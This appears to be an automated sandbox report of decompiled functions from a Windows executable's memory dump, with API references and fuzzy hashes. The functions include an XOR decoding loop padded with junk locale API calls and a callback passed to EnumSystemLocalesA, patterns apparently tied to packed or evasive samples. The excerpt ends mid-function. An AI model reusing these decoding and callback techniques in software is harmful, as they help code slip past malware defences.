                  • Instruction ID: 9bcaa0f32cb8fc485e4d80af3835b2db55b8b8e1951e162ac425388e255cf3a9
                  • Opcode Fuzzy Hash: 79554be0986bbfc098f73cd10f4684f9fcf3f170b892e3214e1fab69c80ac2b7
                  • Instruction Fuzzy Hash: 1E21CDB9401348EFD750EF28EC49A453BF4FB08312F10453AE9089A3A2E7B499858F8D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0044CEC0(intOrPtr __ebx, intOrPtr __edi) {
                  				signed int _v8;
                  				char _v1032;
                  				void* __esi;
                  				signed int _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  				intOrPtr _t15;
                  				void* _t17;
                  				intOrPtr _t18;
                  				signed int _t19;
                  
                  				_t15 = __edi;
                  				_t11 = __ebx;
                  				_t6 =  *0x44f0d4; // 0x45b66027
                  				_t7 = _t6 ^ _t19;
                  				_v8 = _t6 ^ _t19;
                  				_t17 = 0;
                  				if(__edi > 0) {
                  					do {
                  						 *(_t11 + _t17) =  *(_t11 + _t17) ^ E0044C2E0();
                  						if(_t15 == 0x19) {
                  							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
                  							_t7 = GetLocaleInfoW(0, 0, 0, 0);
                  						}
                  						_t17 = _t17 + 1;
                  					} while (_t17 < _t15);
                  				}
                  				_pop(_t18);
                  				if(_t15 == 0x1171) {
                  					 *0x477aa8 = 0xa62e7790;
                  					 *0x477aac = 0xffffffff;
                  				}
                  				return E004020C8(_t7, _t11, _v8 ^ _t19, _t14, _t15, _t18);
                  			}













                  0x0044cec0
                  0x0044cec0
                  0x0044cec9
                  0x0044cece
                  0x0044ced0
                  0x0044ced4
                  0x0044ced8
                  0x0044cee0
                  0x0044cee5
                  0x0044ceeb
                  0x0044cefe
                  0x0044cf0c
                  0x0044cf0c
                  0x0044cf12
                  0x0044cf13
                  0x0044cee0
                  0x0044cf17
                  0x0044cf1e
                  0x0044cf20
                  0x0044cf2a
                  0x0044cf2a
                  0x0044cf41

                  APIs
                  • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0044CEFE
                  • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044CF0C
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: InfoLocaleString
                  • String ID:
                  • API String ID: 486037378-0
                  • Opcode ID: 619383607ee049dc05d4e00ab56b632c32d44afbeebecdbe4beb42279178a16e
                  • Instruction ID: 114b3001312118b35cd6f7bf2c02fe3f80d556a2e317a1ba9087f93e9be93210
                  • Opcode Fuzzy Hash: 619383607ee049dc05d4e00ab56b632c32d44afbeebecdbe4beb42279178a16e
                  • Instruction Fuzzy Hash: 1E01493064230866F7209F98DD82B6E7765EB00710FA1017AEB18BF1C2CA741C44879C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0041E804(void* __eax, void* __ebx, void* __esi) {
                  				int _t12;
                  
                  				asm("o16 cmp al, 0xfe");
                  				 *((intOrPtr*)(__ebx - 0x2708fc18)) =  *((intOrPtr*)(__ebx - 0x2708fc18)) + 1;
                  				asm("sbb eax, eax");
                  				 *((intOrPtr*)(__esi + 0x14)) = __eax + 0xe9;
                  				_t12 = EnumSystemLocalesA(E0041E463, 1);
                  				if(( *(__esi + 8) & 0x00000004) == 0) {
                  					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                  					return _t12;
                  				}
                  				return _t12;
                  			}




                  0x0041e806
                  0x0041e809
                  0x0041e810
                  0x0041e81a
                  0x0041e81d
                  0x0041e827
                  0x0041e829
                  0x00000000
                  0x0041e829
                  0x0041e82d

                  APIs
                  • EnumSystemLocalesA.KERNEL32(Function_0001E463,00000001), ref: 0041E81D
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: ae6596e8c27d87f2aa3dc8e9cbc6aa4e60f818d3c1684a62d727b3b391829424
                  • Instruction ID: 24f49355001627ee36b76b95391cc27e21c4793ded948c33f21bcd425eb7a825
                  • Opcode Fuzzy Hash: ae6596e8c27d87f2aa3dc8e9cbc6aa4e60f818d3c1684a62d727b3b391829424
                  • Instruction Fuzzy Hash: C1D0A7709043018BE7200F35DA483E177E0FB00F15FB0994ECD82410C1C3B864CAC644
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042207D(int _a4, int _a8, short* _a12, int _a16) {
                  
                  				return GetLocaleInfoW(_a4, _a8, _a12, _a16);
                  			}



                  0x00422095

                  APIs
                  • GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0042208E
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 0f7862010a24074c99781ce1d1a265cfbf4d8662de31cf92ab358c2c31a02ec2
                  • Instruction ID: 0604f42b9ad4708c9474dfd5ec34d9a215fb4240b3d3f15be454cbda2f74cc8a
                  • Opcode Fuzzy Hash: 0f7862010a24074c99781ce1d1a265cfbf4d8662de31cf92ab358c2c31a02ec2
                  • Instruction Fuzzy Hash: 97C0023200024DBB8F025F81ED0889A3F2AEB88260B044014FA2C0502087329971AB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040AD9D() {
                  
                  				SetUnhandledExceptionFilter(E0040AD5B);
                  				return 0;
                  			}



                  0x0040ada2
                  0x0040adaa

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000AD5B), ref: 0040ADA2
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: a545bb6e8d73443cc3055ca63858aa6e9b251feb1f4c254a53afe7fa4f829b5b
                  • Instruction ID: 3f50da8734beb60df7d555487da1896ed512a488fb775def19aa41af8a46c9ae
                  • Opcode Fuzzy Hash: a545bb6e8d73443cc3055ca63858aa6e9b251feb1f4c254a53afe7fa4f829b5b
                  • Instruction Fuzzy Hash: A49002B02513405A8B1027705C4D60635D19E4861375208726019D44E4EB644094659A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420038(signed char* _a4, signed char* _a8, signed int _a12) {
                  				signed int _t984;
                  				void* _t986;
                  				signed int _t988;
                  				void* _t989;
                  				void* _t991;
                  				void* _t993;
                  				void* _t994;
                  				void* _t996;
                  				void* _t998;
                  				void* _t1001;
                  				void* _t1003;
                  				void* _t1005;
                  				signed char* _t1006;
                  				void* _t1007;
                  				signed int _t1140;
                  				signed char* _t1144;
                  				signed char* _t1145;
                  				signed char* _t1146;
                  				signed char* _t1147;
                  				void* _t1173;
                  				signed int _t1174;
                  				void* _t1175;
                  				signed char* _t1176;
                  				signed char* _t1177;
                  				signed char* _t1178;
                  				void* _t1188;
                  				void* _t1190;
                  				void* _t1192;
                  				void* _t1195;
                  				void* _t1197;
                  				void* _t1199;
                  				void* _t1202;
                  				void* _t1204;
                  				void* _t1206;
                  				void* _t1209;
                  				void* _t1211;
                  				void* _t1213;
                  				void* _t1216;
                  				void* _t1218;
                  				void* _t1220;
                  				void* _t1223;
                  				void* _t1225;
                  				void* _t1227;
                  				void* _t1230;
                  				void* _t1232;
                  				void* _t1234;
                  				void* _t1237;
                  				void* _t1239;
                  				void* _t1241;
                  
                  				_t1174 = _a12;
                  				_t984 = _t1174;
                  				if(_t984 == 0) {
                  					return 0;
                  				}
                  				_t986 = _t984 - 1;
                  				if(_t986 == 0) {
                  					_t988 =  *_a4 & 0x000000ff;
                  					_t1140 =  *_a8 & 0x000000ff;
                  					L426:
                  					_t989 = _t988 - _t1140;
                  					if(_t989 == 0) {
                  						L438:
                  						return _t989;
                  					}
                  					return (0 | _t989 > 0x00000000) + (0 | _t989 > 0x00000000) - 1;
                  				}
                  				_t991 = _t986 - 1;
                  				if(_t991 == 0) {
                  					_t1144 = _a4;
                  					_t1176 = _a8;
                  					_t993 = ( *_t1144 & 0x000000ff) - ( *_t1176 & 0x000000ff);
                  					if(_t993 == 0) {
                  						L435:
                  						_t988 = _t1144[1] & 0x000000ff;
                  						_t1140 = _t1176[1] & 0x000000ff;
                  						goto L426;
                  					}
                  					_t989 = (0 | _t993 > 0x00000000) + (0 | _t993 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L435;
                  				}
                  				_t994 = _t991 - 1;
                  				if(_t994 == 0) {
                  					_t1145 = _a4;
                  					_t1177 = _a8;
                  					_t996 = ( *_t1145 & 0x000000ff) - ( *_t1177 & 0x000000ff);
                  					if(_t996 == 0) {
                  						L430:
                  						_t998 = (_t1145[1] & 0x000000ff) - (_t1177[1] & 0x000000ff);
                  						if(_t998 == 0) {
                  							L432:
                  							_t988 = _t1145[2] & 0x000000ff;
                  							_t1140 = _t1177[2] & 0x000000ff;
                  							goto L426;
                  						}
                  						_t989 = (0 | _t998 > 0x00000000) + (0 | _t998 > 0x00000000) - 1;
                  						if(_t989 != 0) {
                  							goto L438;
                  						}
                  						goto L432;
                  					}
                  					_t989 = (0 | _t996 > 0x00000000) + (0 | _t996 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L430;
                  				}
                  				if(_t994 == 1) {
                  					_t1146 = _a4;
                  					_t1178 = _a8;
                  					_t1001 = ( *_t1146 & 0x000000ff) - ( *_t1178 & 0x000000ff);
                  					if(_t1001 == 0) {
                  						L421:
                  						_t1003 = (_t1146[1] & 0x000000ff) - (_t1178[1] & 0x000000ff);
                  						if(_t1003 == 0) {
                  							L423:
                  							_t1005 = (_t1146[2] & 0x000000ff) - (_t1178[2] & 0x000000ff);
                  							if(_t1005 == 0) {
                  								L425:
                  								_t988 = _t1146[3] & 0x000000ff;
                  								_t1140 = _t1178[3] & 0x000000ff;
                  								goto L426;
                  							}
                  							_t989 = (0 | _t1005 > 0x00000000) + (0 | _t1005 > 0x00000000) - 1;
                  							if(_t989 != 0) {
                  								goto L438;
                  							}
                  							goto L425;
                  						}
                  						_t989 = (0 | _t1003 > 0x00000000) + (0 | _t1003 > 0x00000000) - 1;
                  						if(_t989 != 0) {
                  							goto L438;
                  						}
                  						goto L423;
                  					}
                  					_t989 = (0 | _t1001 > 0x00000000) + (0 | _t1001 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L421;
                  				} else {
                  					_t1147 = _a8;
                  					_t1006 = _a4;
                  					_t1173 = 0x20;
                  					while(_t1174 >= _t1173) {
                  						if( *_t1006 ==  *_t1147) {
                  							_t1175 = 0;
                  							L16:
                  							if(_t1175 != 0) {
                  								L98:
                  								_t1007 = _t1175;
                  								L178:
                  								return _t1007;
                  							}
                  							if(_t1006[4] == _t1147[4]) {
                  								_t1175 = 0;
                  								L27:
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								if(_t1006[8] == _t1147[8]) {
                  									_t1175 = 0;
                  									L38:
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									if(_t1006[0xc] == _t1147[0xc]) {
                  										_t1175 = 0;
                  										L49:
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										if(_t1006[0x10] == _t1147[0x10]) {
                  											_t1175 = 0;
                  											L60:
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											if(_t1006[0x14] == _t1147[0x14]) {
                  												_t1175 = 0;
                  												L71:
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												if(_t1006[0x18] == _t1147[0x18]) {
                  													_t1175 = 0;
                  													L82:
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													if(_t1006[0x1c] == _t1147[0x1c]) {
                  														_t1175 = 0;
                  														L93:
                  														if(_t1175 != 0) {
                  															goto L98;
                  														} else {
                  															_t1006 =  &(_t1006[_t1173]);
                  															_t1147 =  &(_t1147[_t1173]);
                  															_t1174 = _t1174 - _t1173;
                  															continue;
                  														}
                  													}
                  													_t1188 = (_t1006[0x1c] & 0x000000ff) - (_t1147[0x1c] & 0x000000ff);
                  													if(_t1188 == 0) {
                  														L86:
                  														_t1190 = (_t1006[0x1d] & 0x000000ff) - (_t1147[0x1d] & 0x000000ff);
                  														if(_t1190 == 0) {
                  															L88:
                  															_t1192 = (_t1006[0x1e] & 0x000000ff) - (_t1147[0x1e] & 0x000000ff);
                  															if(_t1192 == 0) {
                  																L90:
                  																_t1175 = (_t1006[0x1f] & 0x000000ff) - (_t1147[0x1f] & 0x000000ff);
                  																if(_t1175 != 0) {
                  																	_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  																}
                  																goto L93;
                  															}
                  															_t1175 = (0 | _t1192 > 0x00000000) + (0 | _t1192 > 0x00000000) - 1;
                  															if(_t1175 != 0) {
                  																goto L98;
                  															}
                  															goto L90;
                  														}
                  														_t1175 = (0 | _t1190 > 0x00000000) + (0 | _t1190 > 0x00000000) - 1;
                  														if(_t1175 != 0) {
                  															goto L98;
                  														}
                  														goto L88;
                  													}
                  													_t1175 = (0 | _t1188 > 0x00000000) + (0 | _t1188 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L86;
                  												}
                  												_t1195 = (_t1006[0x18] & 0x000000ff) - (_t1147[0x18] & 0x000000ff);
                  												if(_t1195 == 0) {
                  													L75:
                  													_t1197 = (_t1006[0x19] & 0x000000ff) - (_t1147[0x19] & 0x000000ff);
                  													if(_t1197 == 0) {
                  														L77:
                  														_t1199 = (_t1006[0x1a] & 0x000000ff) - (_t1147[0x1a] & 0x000000ff);
                  														if(_t1199 == 0) {
                  															L79:
                  															_t1175 = (_t1006[0x1b] & 0x000000ff) - (_t1147[0x1b] & 0x000000ff);
                  															if(_t1175 != 0) {
                  																_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  															}
                  															goto L82;
                  														}
                  														_t1175 = (0 | _t1199 > 0x00000000) + (0 | _t1199 > 0x00000000) - 1;
                  														if(_t1175 != 0) {
                  															goto L98;
                  														}
                  														goto L79;
                  													}
                  													_t1175 = (0 | _t1197 > 0x00000000) + (0 | _t1197 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L77;
                  												}
                  												_t1175 = (0 | _t1195 > 0x00000000) + (0 | _t1195 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L75;
                  											}
                  											_t1202 = (_t1006[0x14] & 0x000000ff) - (_t1147[0x14] & 0x000000ff);
                  											if(_t1202 == 0) {
                  												L64:
                  												_t1204 = (_t1006[0x15] & 0x000000ff) - (_t1147[0x15] & 0x000000ff);
                  												if(_t1204 == 0) {
                  													L66:
                  													_t1206 = (_t1006[0x16] & 0x000000ff) - (_t1147[0x16] & 0x000000ff);
                  													if(_t1206 == 0) {
                  														L68:
                  														_t1175 = (_t1006[0x17] & 0x000000ff) - (_t1147[0x17] & 0x000000ff);
                  														if(_t1175 != 0) {
                  															_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  														}
                  														goto L71;
                  													}
                  													_t1175 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L68;
                  												}
                  												_t1175 = (0 | _t1204 > 0x00000000) + (0 | _t1204 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L66;
                  											}
                  											_t1175 = (0 | _t1202 > 0x00000000) + (0 | _t1202 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L64;
                  										}
                  										_t1209 = (_t1006[0x10] & 0x000000ff) - (_t1147[0x10] & 0x000000ff);
                  										if(_t1209 == 0) {
                  											L53:
                  											_t1211 = (_t1006[0x11] & 0x000000ff) - (_t1147[0x11] & 0x000000ff);
                  											if(_t1211 == 0) {
                  												L55:
                  												_t1213 = (_t1006[0x12] & 0x000000ff) - (_t1147[0x12] & 0x000000ff);
                  												if(_t1213 == 0) {
                  													L57:
                  													_t1175 = (_t1006[0x13] & 0x000000ff) - (_t1147[0x13] & 0x000000ff);
                  													if(_t1175 != 0) {
                  														_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  													}
                  													goto L60;
                  												}
                  												_t1175 = (0 | _t1213 > 0x00000000) + (0 | _t1213 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L57;
                  											}
                  											_t1175 = (0 | _t1211 > 0x00000000) + (0 | _t1211 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L55;
                  										}
                  										_t1175 = (0 | _t1209 > 0x00000000) + (0 | _t1209 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L53;
                  									}
                  									_t1216 = (_t1006[0xc] & 0x000000ff) - (_t1147[0xc] & 0x000000ff);
                  									if(_t1216 == 0) {
                  										L42:
                  										_t1218 = (_t1006[0xd] & 0x000000ff) - (_t1147[0xd] & 0x000000ff);
                  										if(_t1218 == 0) {
                  											L44:
                  											_t1220 = (_t1006[0xe] & 0x000000ff) - (_t1147[0xe] & 0x000000ff);
                  											if(_t1220 == 0) {
                  												L46:
                  												_t1175 = (_t1006[0xf] & 0x000000ff) - (_t1147[0xf] & 0x000000ff);
                  												if(_t1175 != 0) {
                  													_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  												}
                  												goto L49;
                  											}
                  											_t1175 = (0 | _t1220 > 0x00000000) + (0 | _t1220 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L46;
                  										}
                  										_t1175 = (0 | _t1218 > 0x00000000) + (0 | _t1218 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L44;
                  									}
                  									_t1175 = (0 | _t1216 > 0x00000000) + (0 | _t1216 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L42;
                  								}
                  								_t1223 = (_t1006[8] & 0x000000ff) - (_t1147[8] & 0x000000ff);
                  								if(_t1223 == 0) {
                  									L31:
                  									_t1225 = (_t1006[9] & 0x000000ff) - (_t1147[9] & 0x000000ff);
                  									if(_t1225 == 0) {
                  										L33:
                  										_t1227 = (_t1006[0xa] & 0x000000ff) - (_t1147[0xa] & 0x000000ff);
                  										if(_t1227 == 0) {
                  											L35:
                  											_t1175 = (_t1006[0xb] & 0x000000ff) - (_t1147[0xb] & 0x000000ff);
                  											if(_t1175 != 0) {
                  												_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  											}
                  											goto L38;
                  										}
                  										_t1175 = (0 | _t1227 > 0x00000000) + (0 | _t1227 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L35;
                  									}
                  									_t1175 = (0 | _t1225 > 0x00000000) + (0 | _t1225 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L33;
                  								}
                  								_t1175 = (0 | _t1223 > 0x00000000) + (0 | _t1223 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L31;
                  							}
                  							_t1230 = (_t1006[4] & 0x000000ff) - (_t1147[4] & 0x000000ff);
                  							if(_t1230 == 0) {
                  								L20:
                  								_t1232 = (_t1006[5] & 0x000000ff) - (_t1147[5] & 0x000000ff);
                  								if(_t1232 == 0) {
                  									L22:
                  									_t1234 = (_t1006[6] & 0x000000ff) - (_t1147[6] & 0x000000ff);
                  									if(_t1234 == 0) {
                  										L24:
                  										_t1175 = (_t1006[7] & 0x000000ff) - (_t1147[7] & 0x000000ff);
                  										if(_t1175 != 0) {
                  											_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  										}
                  										goto L27;
                  									}
                  									_t1175 = (0 | _t1234 > 0x00000000) + (0 | _t1234 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L24;
                  								}
                  								_t1175 = (0 | _t1232 > 0x00000000) + (0 | _t1232 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L22;
                  							}
                  							_t1175 = (0 | _t1230 > 0x00000000) + (0 | _t1230 > 0x00000000) - 1;
                  							if(_t1175 != 0) {
                  								goto L98;
                  							}
                  							goto L20;
                  						}
                  						_t1237 = ( *_t1006 & 0x000000ff) - ( *_t1147 & 0x000000ff);
                  						if(_t1237 == 0) {
                  							L9:
                  							_t1239 = (_t1006[1] & 0x000000ff) - (_t1147[1] & 0x000000ff);
                  							if(_t1239 == 0) {
                  								L11:
                  								_t1241 = (_t1006[2] & 0x000000ff) - (_t1147[2] & 0x000000ff);
                  								if(_t1241 == 0) {
                  									L13:
                  									_t1175 = (_t1006[3] & 0x000000ff) - (_t1147[3] & 0x000000ff);
                  									if(_t1175 != 0) {
                  										_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  									}
                  									goto L16;
                  								}
                  								_t1175 = (0 | _t1241 > 0x00000000) + (0 | _t1241 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L13;
                  							}
                  							_t1175 = (0 | _t1239 > 0x00000000) + (0 | _t1239 > 0x00000000) - 1;
                  							if(_t1175 != 0) {
                  								goto L98;
                  							}
                  							goto L11;
                  						}
                  						_t1175 = (0 | _t1237 > 0x00000000) + (0 | _t1237 > 0x00000000) - 1;
                  						if(_t1175 != 0) {
                  							goto L98;
                  						}
                  						goto L9;
                  					}
                  					if(_t1174 > 0x1f) {
                  						L177:
                  						_t1007 = 0;
                  						goto L178;
                  					}
                  					switch( *((intOrPtr*)(_t1174 * 4 +  &M00421638))) {
                  						case 0:
                  							goto L177;
                  						case 1:
                  							L256:
                  							__ecx =  *(__ecx - 1) & 0x000000ff;
                  							__eax =  *(__eax - 1) & 0x000000ff;
                  							__eax = __eax - __ecx;
                  							if(__eax != 0) {
                  								0 = 0 | __eax > 0x00000000;
                  								__ecx = (__eax > 0) + (__eax > 0) - 1;
                  								__eax = (__eax > 0) + (__eax > 0) - 1;
                  							}
                  							goto L178;
                  						case 2:
                  							L335:
                  							if( *(__eax - 2) ==  *(__ecx - 2)) {
                  								goto L177;
                  							}
                  							goto L336;
                  						case 3:
                  							L416:
                  							__esi =  *(__eax - 3) & 0x000000ff;
                  							__edx =  *(__ecx - 3) & 0x000000ff;
                  							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  							if(__esi == 0) {
                  								L336:
                  								__edx =  *(__ecx - 2) & 0x000000ff;
                  								__esi =  *(__eax - 2) & 0x000000ff;
                  								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  								if(__esi == 0) {
                  									goto L256;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								if(__edx != 0) {
                  									L418:
                  									__eax = __edx;
                  									goto L178;
                  								}
                  								goto L256;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							if(__edx == 0) {
                  								goto L336;
                  							}
                  							goto L418;
                  						case 4:
                  							L165:
                  							__edx =  *(__eax - 4);
                  							if( *(__eax - 4) ==  *(__ecx - 4)) {
                  								__eax = 0;
                  								L176:
                  								if(__eax != 0) {
                  									goto L178;
                  								}
                  								goto L177;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 4) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  							if(__esi == 0) {
                  								L168:
                  								__esi =  *(__eax - 3) & 0x000000ff;
                  								__edx =  *(__ecx - 3) & 0x000000ff;
                  								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  								if(__esi == 0) {
                  									L170:
                  									__esi =  *(__eax - 2) & 0x000000ff;
                  									__edx =  *(__ecx - 2) & 0x000000ff;
                  									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  									if(__esi == 0) {
                  										L173:
                  										__eax =  *(__eax - 1) & 0x000000ff;
                  										__eax = __eax - __ecx;
                  										if(__eax != 0) {
                  											0 = 0 | __eax > 0x00000000;
                  											__ecx = (__eax > 0) + (__eax > 0) - 1;
                  											__eax = (__eax > 0) + (__eax > 0) - 1;
                  										}
                  										goto L176;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									if(__edx == 0) {
                  										goto L173;
                  									}
                  									L172:
                  									__eax = __edx;
                  									goto L176;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								if(__edx != 0) {
                  									goto L172;
                  								}
                  								goto L170;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							if(__edx != 0) {
                  								goto L172;
                  							}
                  							goto L168;
                  						case 5:
                  							L245:
                  							__edx =  *(__eax - 5);
                  							if( *(__eax - 5) ==  *(__ecx - 5)) {
                  								__esi = 0;
                  								L255:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L256;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 5) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  							if(__esi == 0) {
                  								L248:
                  								__esi =  *(__eax - 4) & 0x000000ff;
                  								__edx =  *(__ecx - 4) & 0x000000ff;
                  								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  								if(__esi == 0) {
                  									L250:
                  									__esi =  *(__eax - 3) & 0x000000ff;
                  									__edx =  *(__ecx - 3) & 0x000000ff;
                  									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  									if(__esi == 0) {
                  										L252:
                  										__esi =  *(__eax - 2) & 0x000000ff;
                  										__edx =  *(__ecx - 2) & 0x000000ff;
                  										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L255;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L252;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L250;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L248;
                  						case 6:
                  							L324:
                  							__edx =  *(__eax - 6);
                  							if( *(__eax - 6) ==  *(__ecx - 6)) {
                  								__esi = 0;
                  								L334:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L335;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 6) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  							if(__esi == 0) {
